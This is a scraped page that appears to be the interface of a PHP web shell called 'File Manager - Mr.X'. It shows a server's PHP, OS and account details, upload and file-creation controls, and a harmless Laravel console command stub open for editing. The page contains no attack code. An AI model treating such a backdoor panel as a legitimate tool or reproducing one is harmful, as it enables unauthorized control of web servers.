🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:console.stub
<?php namespace {{ namespace }}; use Illuminate\Console\Attributes\Description; use Illuminate\Console\Attributes\Signature; use Illuminate\Console\Command; #[Signature('{{ command }}')] #[Description('Command description')] class {{ class }} extends Command { /** * Execute the console command. */ public function handle() { // } }
Save Changes
Cancel
Create New File
Create New Folder